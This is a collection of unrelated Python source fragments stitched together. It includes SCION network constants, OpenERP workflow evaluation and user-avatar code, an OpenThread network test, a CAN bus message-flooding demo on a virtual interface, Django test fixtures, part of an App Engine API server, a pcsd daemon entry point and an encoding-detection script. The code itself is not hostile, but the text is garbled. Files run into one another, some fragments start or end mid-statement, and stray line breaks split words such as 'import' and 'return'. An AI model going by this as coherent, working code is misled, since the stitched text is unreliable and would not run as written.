#: Default SCION filter command port
SCION_FILTER_CMD_PORT = 30042
#: Default DNS UDP/TCP port
SCION_DNS_PORT = 30053
#: Default SCION router UDP port.
SCION_ROUTER_PORT = 50000
#: Default SCION dispatcher host addr
SCION_DISPATCHER_ADDR = "/run/shm/dispatcher.sock"
#: Default SCION dispatcher port
SCION_DISPATCHER_PORT = 3334
#: Default SCION dispatcher UNIX socket directory
DISPATCHER_DIR = "/run/shm/dispatcher"
#: Default SCION dispatcher ID
DEFAULT_DISPATCHER_ID = "default"

#: Short identifiers for the SCION infrastructure service types.
BEACON_SERVICE = "bs"
CERTIFICATE_SERVICE = "cs"
DNS_SERVICE = "ds"
PATH_SERVICE = "ps"
ROUTER_SERVICE = "br"
SIBRA_SERVICE = "sb"
#: All the service types
SERVICE_TYPES = (
    BEACON_SERVICE,
    CERTIFICATE_SERVICE,
    DNS_SERVICE,
    PATH_SERVICE,
    ROUTER_SERVICE,
    SIBRA_SERVICE,
)

#: Dispatcher registration timeout
DISPATCHER_TIMEOUT = 60

#: How often IFID packet is sent to neighboring router.
IFID_PKT_TOUT = 1

#: Default MTU - assumes overlay is ipv4+udp
DEFAULT_MTU = 1500 - 20 - 8
#: IPv6 min value
SCION_MIN_MTU = 1280
#: Length of opaque fields
OPAQUE_FIELD_LEN = 8
#: How long certain warnings should be suppressed after startup
STARTUP_QUIET_PERIOD = 30

#: Number of seconds per sibra tick
SIBRA_TICK = 4
#: How far in the future a steady path can reserve at a time.
SIBRA_MAX_STEADY_TICKS = 45
#: How far in the future an ephemeral path can reserve at a time.
SIBRA_MAX_EPHEMERAL_TICKS = 4
#: Length of steady path ID in bytes
SIBRA_STEADY_ID_LEN = 8
#: Length of ephemeral path ID in bytes
SIBRA_EPHEMERAL_ID_LEN = 16
#: SIBRA Bandwidth multiplier
SIBRA_BW_FACTOR = 16 * 1024
#: SIBRA max reservation index
SIBRA_MAX_IDX = 16

#: Path flag selecting SIBRA paths.
PATH_FLAG_SIBRA = "SIBRA"

#: Max host address length in bytes (16 fits an IPv6 address).
MAX_HOST_ADDR_LEN = 16

# Time per Epoch
HASHTREE_EPOCH_TIME = 10
# The tolerable error in epoch in seconds.
HASHTREE_EPOCH_TOLERANCE = 5
# Max time to live
HASHTREE_TTL = MAX_SEGMENT_TTL
# Number of epochs in one TTL per interface
HASHTREE_N_EPOCHS = HASHTREE_TTL // HASHTREE_EPOCH_TIME
# How much time in advance to compute the next hash tree
HASHTREE_UPDATE_WINDOW = HASHTREE_TTL // 3

# TCP polling timeouts, used by accept() and recv().
TCP_ACCEPT_POLLING_TOUT = 1
# SCION control-plane TCP connection timeout.
TCP_TIMEOUT = 5
# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

import sys

import openerp.netsvc as netsvc
import openerp.osv as base
import openerp.pooler as pooler
# NOTE: 'eval' below is deliberately the sandboxed safe_eval, not the builtin.
from openerp.tools.safe_eval import safe_eval as eval

class Env(dict):
    """Evaluation namespace for workflow expressions.

    Dict subclass whose item lookup first resolves record fields and
    model attributes (via browse on the first record id), falling back
    to normal dict lookup. Instances are passed as the namespace to
    safe_eval so expressions can reference field names directly.
    """

    def __init__(self, cr, uid, model, ids):
        self.cr = cr
        self.uid = uid
        self.model = model
        self.ids = ids
        self.obj = pooler.get_pool(cr.dbname).get(model)
        # Python 2: dict.keys() returns lists, so '+' concatenates them.
        self.columns = self.obj._columns.keys() + self.obj._inherit_fields.keys()

    def __getitem__(self, key):
        # Field or model attribute -> read it from the first record;
        # anything else -> plain dict lookup (e.g. names safe_eval injects).
        if (key in self.columns) or (key in dir(self.obj)):
            res = self.obj.browse(self.cr, self.uid, self.ids[0])
            return res[key]
        else:
            return super(Env, self).__getitem__(key)

def _eval_expr(cr, ident, workitem, action):
    """Evaluate a multi-line workflow expression; return the last line's value.

    Each line is evaluated in order against an Env namespace; only the
    result of the final non-empty line is returned. 'True'/'False'
    literals are short-circuited without calling safe_eval.
    """
    ret=False
    assert action, 'You used a NULL action in a workflow, use dummy node instead.'
    for line in action.split('\n'):
        line = line.strip()
        # ident is the (uid, model, record_id) triple used throughout.
        uid=ident[0]
        model=ident[1]
        ids=[ident[2]]
        if line =='True':
            ret=True
        elif line =='False':
            ret=False
        else:
            env = Env(cr, uid, model, ids)
            # nocopy=True: let safe_eval mutate env directly so assignments
            # on one line are visible to the following lines.
            ret = eval(line, env, nocopy=True)
    return ret

def execute_action(cr, ident, workitem, activity):
    """Run the ir.actions.server action attached to a workflow activity."""
    obj = pooler.get_pool(cr.dbname).get('ir.actions.server')
    ctx = {'active_model':ident[1], 'active_id':ident[2], 'active_ids':[ident[2]]}
    result = obj.run(cr, ident[0], [activity['action_id']], ctx)
    return result

def execute(cr, ident, workitem, activity):
    """Evaluate a workflow activity's python 'action' expression."""
    return _eval_expr(cr, ident, workitem, activity['action'])

def check(cr, workitem, ident, transition, signal):
    """Decide whether a workflow transition may fire.

    Checks, in order: the expected signal, the required user group
    (uid 1 — admin — bypasses the group check), and finally the
    transition's python condition expression.
    """
    if transition['signal'] and signal != transition['signal']:
        return False

    uid = ident[0]
    if transition['group_id'] and uid != 1:
        pool = pooler.get_pool(cr.dbname)
        user_groups = pool.get('res.users').read(cr, uid, [uid], ['groups_id'])[0]['groups_id']
        if not transition['group_id'] in user_groups:
            return False

    return _eval_expr(cr, ident, workitem, transition['condition'])
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
#!/usr/bin/env python # # Copyright (c) 2016, The OpenThread Authors. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. 
#

import time
import unittest

import node

# Node ids used to index self.nodes.
LEADER = 1
ROUTER = 2
ED1 = 3     # end device
SED1 = 4    # sleepy end device

class Cert_5_6_1_NetworkDataLeaderAsBr(unittest.TestCase):
    """Thread certification test 5.6.1: leader acting as border router.

    Builds a 4-node topology (leader - router - {ED, SED}), has the
    leader advertise two prefixes, and verifies address configuration
    and reachability on the children.
    """

    def setUp(self):
        # Create the simulated nodes and wire the topology with
        # pairwise whitelists so only intended links exist.
        self.nodes = {}
        for i in range(1,5):
            self.nodes[i] = node.Node(i)

        self.nodes[LEADER].set_panid(0xface)
        self.nodes[LEADER].set_mode('rsdn')
        self.nodes[LEADER].add_whitelist(self.nodes[ROUTER].get_addr64())
        self.nodes[LEADER].enable_whitelist()

        self.nodes[ROUTER].set_panid(0xface)
        self.nodes[ROUTER].set_mode('rsdn')
        self.nodes[ROUTER].add_whitelist(self.nodes[LEADER].get_addr64())
        self.nodes[ROUTER].add_whitelist(self.nodes[ED1].get_addr64())
        self.nodes[ROUTER].add_whitelist(self.nodes[SED1].get_addr64())
        self.nodes[ROUTER].enable_whitelist()
        self.nodes[ROUTER].set_router_selection_jitter(1)

        self.nodes[ED1].set_panid(0xface)
        self.nodes[ED1].set_mode('rsn')
        self.nodes[ED1].add_whitelist(self.nodes[ROUTER].get_addr64())
        self.nodes[ED1].enable_whitelist()

        # 's' mode = sleepy end device; short timeout keeps the test fast.
        self.nodes[SED1].set_panid(0xface)
        self.nodes[SED1].set_mode('s')
        self.nodes[SED1].add_whitelist(self.nodes[ROUTER].get_addr64())
        self.nodes[SED1].enable_whitelist()
        self.nodes[SED1].set_timeout(3)

    def tearDown(self):
        # NOTE(review): the loop variable shadows the imported 'node'
        # module; harmless here since tearDown does not use the module.
        for node in list(self.nodes.values()):
            node.stop()
        del self.nodes

    def test(self):
        # Bring up the leader and publish two prefixes: one with full
        # flags ('paros') and one without the SLAAC-for-SED flag ('paro').
        self.nodes[LEADER].start()
        self.nodes[LEADER].set_state('leader')
        self.assertEqual(self.nodes[LEADER].get_state(), 'leader')
        self.nodes[LEADER].add_prefix('2001:2:0:1::/64', 'paros')
        self.nodes[LEADER].add_prefix('2001:2:0:2::/64', 'paro')
        self.nodes[LEADER].register_netdata()

        # Attach the rest of the topology, waiting for role convergence.
        self.nodes[ROUTER].start()
        time.sleep(5)
        self.assertEqual(self.nodes[ROUTER].get_state(), 'router')

        self.nodes[ED1].start()
        time.sleep(5)
        self.assertEqual(self.nodes[ED1].get_state(), 'child')

        self.nodes[SED1].start()
        time.sleep(5)
        self.assertEqual(self.nodes[SED1].get_state(), 'child')

        # ED should autoconfigure addresses from both prefixes and be
        # reachable from the leader on each of them.
        addrs = self.nodes[ED1].get_addrs()
        self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
        self.assertTrue(any('2001:2:0:2' in addr[0:10] for addr in addrs))
        for addr in addrs:
            if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
                self.assertTrue(self.nodes[LEADER].ping(addr))

        # SED should only get an address from the first prefix.
        addrs = self.nodes[SED1].get_addrs()
        self.assertTrue(any('2001:2:0:1' in addr[0:10] for addr in addrs))
        self.assertFalse(any('2001:2:0:2' in addr[0:10] for addr in addrs))
        for addr in addrs:
            if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
                self.assertTrue(self.nodes[LEADER].ping(addr))

if __name__ == '__main__':
    unittest.main()
""" This demo creates multiple processes of Producers to spam a socketcan bus. """ i
mport time import logging import concurrent.futures import can can.rc['interface'] = 'socketcan_native' from can.interfaces.interface import Bus can_interface = 'vca
n0' def producer(id): """:param id: Spam the bus with messages including the data id.""" bus = Bus(can_interface) for i in range(16): msg = can.Message(arbitration_id=0x0cf02200, data=[id, i, 0, 1, 3, 1, 4, 1]) bus.send(msg) # TODO Issue #3: Need to keep running to ensure the writing threads stay alive. ? time.sleep(2) if __name__ == "__main__": #logging.getLogger('').setLevel(logging.DEBUG) with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor: executor.map(producer, range(5)) time.sleep(2)
# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2017 Didotech SRL

import logging
from openerp.osv import fields, orm
import tools
from openerp import addons

_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)


class res_users(orm.Model):
    """Extends res.users with kanban avatar image fields.

    Adds 'image' plus resized function fields ('image_medium',
    'image_small') and a default avatar, mirroring the res.partner
    image handling. Python 2 codebase (uses str.encode('base64')).
    """
    _inherit = "res.users"

    def _get_photo(self, cr, uid, context=None):
        """Return the bundled default avatar as base64-encoded bytes."""
        photo_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png')
        # NOTE(review): file handle is never closed; consider a 'with'
        # block if this module is ever touched for behavior changes.
        return open(photo_path, 'rb').read().encode('base64')

    def _get_image(self, cr, uid, ids, name, args, context=None):
        """Function-field getter: resized variants of each user's image."""
        result = dict.fromkeys(ids, False)
        for obj in self.browse(cr, uid, ids, context=context):
            result[obj.id] = tools.image_get_resized_images(obj.image)
        return result

    def _set_image(self, cr, uid, id, name, value, args, context=None):
        """Function-field setter: store the big-resized source image."""
        return self.write(cr, uid, [id], {'image': tools.image_resize_image_big(value)}, context=context)

    def _has_image(self, cr, uid, ids, name, args, context=None):
        """Function-field getter: truthy image data or False per user."""
        result = {}
        for obj in self.browse(cr, uid, ids, context=context):
            result[obj.id] = obj.image or False
        return result

    def _get_default_image(self, cr, uid, context=None):
        """Return the default avatar, resized, as the 'image' default."""
        image_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png')
        # NOTE(review): file handle is never closed here either.
        return tools.image_resize_image_big(open(image_path, 'rb').read().encode('base64'))

    _columns = {
        'image': fields.binary("Image",
            help="This field holds the image used as avatar for this contact, limited to 1024x1024px"),
        'image_medium': fields.function(_get_image, fnct_inv=_set_image,
            string="Medium-sized image", type="binary", multi="_get_image",
            # NOTE(review): store trigger is keyed on res.partner although
            # the field lives on res.users — confirm this is intended.
            store={
                'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
            },
            help="Medium-sized image of this contact. It is automatically "\
                 "resized as a 128x128px image, with aspect ratio preserved. "\
                 "Use this field in form views or some kanban views."),
        'image_small': fields.function(_get_image, fnct_inv=_set_image,
            string="Small-sized image", type="binary", multi="_get_image",
            store={
                'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
            },
            help="Small-sized image of this contact. It is automatically "\
                 "resized as a 64x64px image, with aspect ratio preserved. "\
                 "Use this field anywhere a small image is required."),
        'has_image': fields.function(_has_image, type="boolean"),
    }

    _defaults = {
        'image': lambda self, cr, uid, ctx={}: self._get_default_image(cr, uid, ctx),
    }
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
""".""" def get_systeminfo(resource, config, interactive=False):
""".""" ret
urn {'ohai': 'there!'}
from abc import ABCMeta, abstractmethod


class Parent(object):
    """Abstract interface requiring my_method and my_method2.

    Uses the Python 2 ``__metaclass__`` attribute to hook in ABCMeta;
    concrete subclasses must implement both abstract methods.
    """

    __metaclass__ = ABCMeta

    @abstractmethod
    def my_method(self, foo):
        """Handle *foo*; must be provided by subclasses."""
        pass

    @abstractmethod
    def my_method2(self):
        """Parameterless hook; must be provided by subclasses."""
        pass
"""py.test funcargs providing a Django test client and test users.

Python 2 / legacy py.test codebase: uses the old ``pytest_funcarg__*``
naming and ``request.cached_setup`` APIs.
"""
import os, sys
from functools import partial

# Make the local settings module importable when run outside manage.py.
if 'DJANGO_SETTINGS_MODULE' not in os.environ:
    sys.path.append('.')
    os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'

from django.conf import settings
from django.test.client import Client
from django.test.utils import setup_test_environment, teardown_test_environment
from django.core.management import call_command
from django.core import mail
from django.contrib.auth.models import User

def pytest_funcarg__django_client(request):
    '''py.test funcargs are awesome.  This ugly function basically creates a
    test environment with an empty database every time you write a test
    function that accepts an argument named 'django_client.'  Most of the
    time you won't use this, you'll use the 'client' funcarg below instead.
    This funcarg is only reset once per test session.  The 'client' funcarg
    empties the database after each test to ensure a clean slate.'''
    try:
        old_name = settings.DATABASES['default']['NAME']
    except AttributeError:
        # try older settings format
        old_name = settings.DATABASE_NAME

    def setup():
        # Build a fresh test database (with South migration patching when
        # South is installed) and hand back a Django test client.
        setup_test_environment()
        if not hasattr(settings, 'DEBUG'):
            settings.DEBUG = False
        if 'south' in settings.INSTALLED_APPS:
            from south.management.commands import patch_for_test_db_setup
            patch_for_test_db_setup()
        from django.db import connection
        connection.creation.create_test_db(1, True)
        return Client()

    def teardown(client):
        # Drop the test database and restore the original connection name.
        teardown_test_environment()
        from django.db import connection
        connection.creation.destroy_test_db(old_name, 1)

    return request.cached_setup(setup, teardown, "session")

def pytest_funcarg__client(request):
    '''Creates a test environment using the 'django_client' funcarg above,
    but also ensures the database is flushed after running each test.'''
    def setup():
        return request.getfuncargvalue('django_client')
    def teardown(client):
        # Per-test cleanup: empty the database and the captured outbox.
        call_command('flush', verbosity=0, interactive=False)
        mail.outbox = []
    return request.cached_setup(setup, teardown, "function")

def user_creator(name, email, **extra):
    '''Creates a user.'''
    # Note: I make test usernames and passwords identical for easy login
    user = User.objects.create_user(username=name, password=name, email=email)
    # Python 2 dict API; extra kwargs become attributes (e.g. is_staff).
    for attr, value in extra.iteritems():
        setattr(user, attr, value)
    user.save()
    return user

def pytest_funcarg__user(request):
    '''Create a user with no special permissions.'''
    return request.cached_setup(partial(user_creator, "user", "user@example.com"),
                                lambda user: user.delete(), "session")

def pytest_funcarg__admin(request):
    '''Create an admin user with all permissions.'''
    return request.cached_setup(partial(user_creator, "admin", "admin@example.com",
                                        is_superuser=True, is_staff=True),
                                lambda user: user.delete(), "session")
default=False) parser.add_argument('--high_replication', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--require_indexes', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--clear_datastore', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--logs_path', default=None) parser.add_argument('--enable_sendmail', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--smtp_host', default='') parser.add_argument('--smtp_port', default=25, type=int) parser.add_argument('--smtp_user', default='') parser.add_argument('--smtp_password', default='') parser.add_argument('--show_mail_body', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--smtp_allow_tls', action=boolean_action.BooleanAction, const=True, default=True) parser.add_argument('--prospective_search_path', default=None) parser.add_argument('--clear_prospective_search', action=boolean_action.BooleanAction, const=True, default=False) parser.add_argument('--enable_task_running', action=boolean_action.BooleanAction, const=True, default=True) parser.add_argument('--task_retry_seconds', default=30, type=int) parser.add_argument('--user_login_url', default=None) parser.add_argument('--user_logout_url', default=None) return parser.parse_args(args) class APIServerProcess(object): """Manages an API Server running as a seperate process.""" def __init__(self, executable, host, port, app_id, script=None, appidentity_email_address=None, appidentity_private_key_path=None, application_host=None, application_port=None, application_root=None, auto_id_policy=None, blobstore_path=None, clear_datastore=None, clear_prospective_search=None, datastore_path=None, enable_sendmail=None, enable_task_running=None, high_replication=None, logs_path=None, prospective_search_path=None, require_indexes=None, show_mail_body=None, smtp_host=None, smtp_password=None, 
smtp_port=None, smtp_user=None, smtp_allow_tls=None, task_retry_seconds=None, trusted=None, use_sqlite=None, default_gcs_bucket_name=None): """Configures the APIs hosted by this server. Args: executable: The path of the executable to use when running the API Server e.g. "/usr/bin/python". host: The host name that should be used by the API Server e.g. "localhost". port: The port number that should be used by the API Server e.g. 8080. app_id: The str application id e.g. "guestbook". script: The name of the script that should be used, along with the executable argument, to run the API Server e.g. "api_server.py". If None then the executable is run without a script argument. appidentity_email_address: Email address for service account substitute. appidentity_private_key_path: Private key for service account substitute. application_host: The name of the host where the development application server is running e.g. "localhost". application_port: The port where the application server is running e.g. 8000. application_root: The path to the directory containing the user's application e.g. "/home/bquinlan/myapp". auto_id_policy: One of "sequential" or "scattered", indicating whether the Datastore stub should assign IDs sequentially or scattered. blobstore_path: The path to the file that should be used for blobstore storage. clear_datastore: Clears the file at datastore_path, emptying the datastore from previous runs. clear_prospective_search: Clears the file at prospective_search_path, emptying the perspective search state from previous runs. datastore_path: The path to the file that should be used for datastore storage. enable_sendmail: A bool indicating if sendmail should be used when sending e-mails. This argument is ignored if mail_smtp_host is not None. enable_task_running: A bool indicating whether taskqueue tasks should be run automatically or it the must be manually triggered. high_replication: A bool indicating whether to use the high replication consistency model. 
logs_path: Path to the file to store the logs data in. prospective_search_path: The path to the file that should be used to save prospective search subscriptions. require_indexes: A bool indicating if the same production datastore indexes requirements should be enforced i.e. if True then a google.appengine.ext.db.NeedIndexError will be be raised if a query is executed without the required indexes. show_mail_body: A bool indicating whether the body of sent e-mails should be written to the logs. smtp_host: The SMTP hostname that should be used when sending e-mails. If None then the enable_sendmail argument is considered. smtp_password: The password to use when authenticating with the
SMTP server. This v
alue may be None if smtp_host or smtp_user is also None. smtp_port: The SMTP port number that should be used when sending e-mails. If this value is None then smtp_host must also be None. smtp_user: The username to use when authenticating with the SMTP server. This value may be None if smtp_host is also None or if the SMTP server does not require authentication. smtp_allow_tls: A bool indicating whether to enable TLS. task_retry_seconds: An int representing the number of seconds to wait before a retrying a failed taskqueue task. trusted: A bool indicating if privileged APIs should be made available. use_sqlite: A bool indicating whether DatastoreSqliteStub or DatastoreFileStub should be used. default_gcs_bucket_name: A str overriding the normal default bucket name. """ self._process = None self._host = host self._port = port if script: self._args = [executable, script] else: self._args = [executable] self._BindArgument('--api_host', host) self._BindArgument('--api_port', port) self._BindArgument('--appidentity_email_address', appidentity_email_address) self._BindArgument('--appidentity_private_key_path', appidentity_private_key_path) self._BindArgument('--application_host', application_host) self._BindArgument('--application_port', application_port) self._BindArgument('--application_root', application_root) self._BindArgument('--application', app_id) self._BindArgument('--auto_id_policy', auto_id_policy) self._BindArgument('--blobstore_path', blobstore_path) self._BindArgument('--clear_datastore', clear_datastore) self._BindArgument('--clear_prospective_search', clear_prospective_search) self._BindArgument('--datastore_path', datastore_path) self._BindArgument('--enable_sendmail', enable_sendmail) self._BindArgument('--enable_task_running', enable_task_running) self._BindArgument('--high_replication', high_replicati
"""Entry point of the pcs daemon.

Wires together the tornado HTTPS server, the ruby pcsd wrapper, session
storage and the optional web UI, and runs the IO loop until a signal stops it.
"""
import os
import signal
import socket
from pathlib import Path

from tornado.ioloop import IOLoop
from tornado.locks import Lock
from tornado.web import Application

from pcs import settings
from pcs.daemon import log, ruby_pcsd, session, ssl, systemd
from pcs.daemon.app import sinatra_ui, sinatra_remote, ui
from pcs.daemon.app.common import RedirectHandler
from pcs.daemon.env import prepare_env
from pcs.daemon.http_server import HttpsServerManage


class SignalInfo:
    # Module-level mutable state shared between main() and handle_signal():
    # the running server manager (if started) and whether the IO loop runs.
    # pylint: disable=too-few-public-methods
    server_manage = None
    ioloop_started = False


def handle_signal(incomming_signal, frame):
    """Shut down cleanly on SIGTERM/SIGINT: stop the server, stop the loop."""
    # pylint: disable=unused-argument
    log.pcsd.warning("Caught signal: %s, shutting down", incomming_signal)
    if SignalInfo.server_manage:
        SignalInfo.server_manage.stop()
    if SignalInfo.ioloop_started:
        IOLoop.current().stop()
    raise SystemExit(0)


def sign_ioloop_started():
    # Scheduled as the first IO loop callback so handle_signal() knows
    # whether IOLoop.current().stop() is needed.
    SignalInfo.ioloop_started = True


def config_sync(sync_config_lock: Lock, ruby_pcsd_wrapper: ruby_pcsd.Wrapper):
    """Return a self-rescheduling coroutine that syncs configs via ruby pcsd.

    Each run holds sync_config_lock while syncing, then re-registers itself
    with call_at() for the timestamp returned by sync_configs().
    """
    async def config_synchronization():
        async with sync_config_lock:
            next_run_time = await ruby_pcsd_wrapper.sync_configs()
        IOLoop.current().call_at(next_run_time, config_synchronization)
    return config_synchronization


def configure_app(
    session_storage: session.Storage,
    ruby_pcsd_wrapper: ruby_pcsd.Wrapper,
    sync_config_lock: Lock,
    public_dir,
    disable_gui=False,
    debug=False,
):
    """Return an application factory suitable for HttpsServerManage."""
    def make_app(https_server_manage: HttpsServerManage):
        """
        https_server_manage -- allows to control the server (specifically
        reload its SSL certificates). A relevant handler should get this
        object via the method `initialize`.
        """
        # Remote (pcsd-to-pcsd) routes are always served.
        routes = sinatra_remote.get_routes(
            ruby_pcsd_wrapper,
            sync_config_lock,
            https_server_manage,
        )

        if not disable_gui:
            routes.extend(
                # old web ui by default
                [(r"/", RedirectHandler, dict(url="/manage"))]
                + [(r"/ui", RedirectHandler, dict(url="/ui/"))]
                + ui.get_routes(
                    url_prefix="/ui/",
                    app_dir=os.path.join(public_dir, "ui"),
                    fallback_page_path=os.path.join(
                        public_dir,
                        "ui_instructions.html",
                    ),
                    session_storage=session_storage,
                )
                + sinatra_ui.get_routes(
                    session_storage, ruby_pcsd_wrapper, public_dir
                )
            )
        return Application(routes, debug=debug)
    return make_app


def main():
    """Configure logging/env/SSL, start the HTTPS server and the IO loop."""
    signal.signal(signal.SIGTERM, handle_signal)
    signal.signal(signal.SIGINT, handle_signal)
    # touch() creates the log file with restrictive permissions; the mode
    # only applies if the file does not exist yet.
    Path(settings.pcsd_log_location).touch(mode=0o600, exist_ok=True)
    log.setup(settings.pcsd_log_location)
    env = prepare_env(os.environ, log.pcsd)
    if env.has_errors:
        raise SystemExit(1)
    if env.PCSD_DEBUG:
        log.enable_debug()
    sync_config_lock = Lock()
    ruby_pcsd_wrapper = ruby_pcsd.Wrapper(
        settings.pcsd_ruby_socket,
        debug=env.PCSD_DEBUG,
    )
    make_app = configure_app(
        session.Storage(env.PCSD_SESSION_LIFETIME),
        ruby_pcsd_wrapper,
        sync_config_lock,
        env.PCSD_STATIC_FILES_DIR,
        disable_gui=env.PCSD_DISABLE_GUI,
        debug=env.PCSD_DEV,
    )
    pcsd_ssl = ssl.PcsdSSL(
        server_name=socket.gethostname(),
        cert_location=settings.pcsd_cert_location,
        key_location=settings.pcsd_key_location,
        ssl_options=env.PCSD_SSL_OPTIONS,
        ssl_ciphers=env.PCSD_SSL_CIPHERS,
    )
    try:
        SignalInfo.server_manage = HttpsServerManage(
            make_app,
            port=env.PCSD_PORT,
            bind_addresses=env.PCSD_BIND_ADDR,
            ssl=pcsd_ssl,
        ).start()
    except socket.gaierror as e:
        log.pcsd.error(
            "Unable to bind to specific address(es), exiting: %s ", e
        )
        raise SystemExit(1) from e
    except OSError as e:
        log.pcsd.error("Unable to start pcsd daemon, exiting: %s ", e)
        raise SystemExit(1) from e
    except ssl.SSLCertKeyException as e:
        for error in e.args:
            log.pcsd.error(error)
        log.pcsd.error("Invalid SSL certificate and/or key, exiting")
        raise SystemExit(1) from e
    ioloop = IOLoop.current()
    ioloop.add_callback(sign_ioloop_started)
    # Notify systemd about readiness only when running under systemd.
    if systemd.is_systemd() and env.NOTIFY_SOCKET:
        ioloop.add_callback(systemd.notify, env.NOTIFY_SOCKET)
    ioloop.add_callback(config_sync(sync_config_lock, ruby_pcsd_wrapper))
    ioloop.start()
#!/usr/bin/env python
'''
*******************************************************************************
Description: This tool can help you determine the character encoding of a
             text file by converting one line from the file to every(?)
             possible character encoding. It writes the converted lines to
             a new text file using the same filename but appending the
             extension '.encodings' to it. You have to examine this file
             visually to find the correct encoding.
Usage      : test_encodings.py filename [number of line to test]
Licence    : Public Domain.
Author     : Antonios Tsolis (2016)
*******************************************************************************
'''
import io
import os
import sys

from encodings.aliases import aliases

# Predefined set of candidate codec names (Python standard encodings).
# Some entries are platform- or version-specific (e.g. "mbcs" is Windows
# only, "unicode_internal" was removed in Python 3); decode failures are
# simply skipped at runtime.
encs = {
    "ascii", "big5", "big5hkscs", "cp037", "cp424", "cp437", "cp500",
    "cp720", "cp737", "cp775", "cp850", "cp852", "cp855", "cp856", "cp857",
    "cp858", "cp860", "cp861", "cp862", "cp863", "cp864", "cp865", "cp866",
    "cp869", "cp874", "cp875", "cp932", "cp949", "cp950", "cp1006",
    "cp1026", "cp1140", "cp1250", "cp1251", "cp1252", "cp1253", "cp1254",
    "cp1255", "cp1256", "cp1257", "cp1258", "euc_jp", "euc_jis_2004",
    "euc_jisx0213", "euc_kr", "gb2312", "gbk", "gb18030", "hz",
    "iso2022_jp", "iso2022_jp_1", "iso2022_jp_2", "iso2022_jp_2004",
    "iso2022_jp_3", "iso2022_jp_ext", "iso2022_kr", "latin_1", "iso8859_2",
    "iso8859_3", "iso8859_4", "iso8859_5", "iso8859_6", "iso8859_7",
    "iso8859_8", "iso8859_9", "iso8859_10", "iso8859_13", "iso8859_14",
    "iso8859_15", "iso8859_16", "johab", "koi8_r", "koi8_u", "mac_cyrillic",
    "mac_greek", "mac_iceland", "mac_latin2", "mac_roman", "mac_turkish",
    "ptcp154", "shift_jis", "shift_jis_2004", "shift_jisx0213", "utf_32",
    "utf_32_be", "utf_32_le", "utf_16", "utf_16_be", "utf_16_le", "utf_7",
    "utf_8", "utf_8_sig", "idna", "mbcs", "palmos", "punycode", "rot_13",
    "raw_unicode_escape", "unicode_escape", "unicode_internal",
    "base64_codec", "bz2_codec", "hex_codec", "uu_codec", "zlib_codec"
}


def write_encodings(filename, line_number, final_encoding):
    """Decode one line of *filename* with every known codec and dump results.

    Reads line *line_number* (1-based) as raw bytes, tries to decode it with
    the union of our predefined codec set and encodings.aliases.aliases, and
    writes each successful decode (prefixed by the codec name) to
    ``filename + '.encodings'``, encoded with *final_encoding*.

    Exits the process with status 1 if the input file cannot be read.
    """
    # To ensure that we cover as many encodings as possible, take the union
    # of our predefined encoding set and the values from
    # encodings.aliases.aliases.
    encodings = encs.union(set(aliases.values()))
    data = dict()

    # Read the requested line from the file as raw bytes.
    try:
        with io.open(filename, "rb") as f:
            lines = f.readlines()
        line = lines[line_number - 1]
        print("\nProcessing line number: " + str(line_number))
        if len(line) < 3:
            print("!!!Warning!!!: Possible empty line.")
        print("")
    except Exception as err:
        print("Error reading " + filename)
        print(err)
        sys.exit(1)

    # Decode the line using every candidate encoding; skip failures.
    for enc in encodings:
        try:
            data[enc] = line.decode(enc)
        except Exception:
            print("Cannot decode using " + enc)

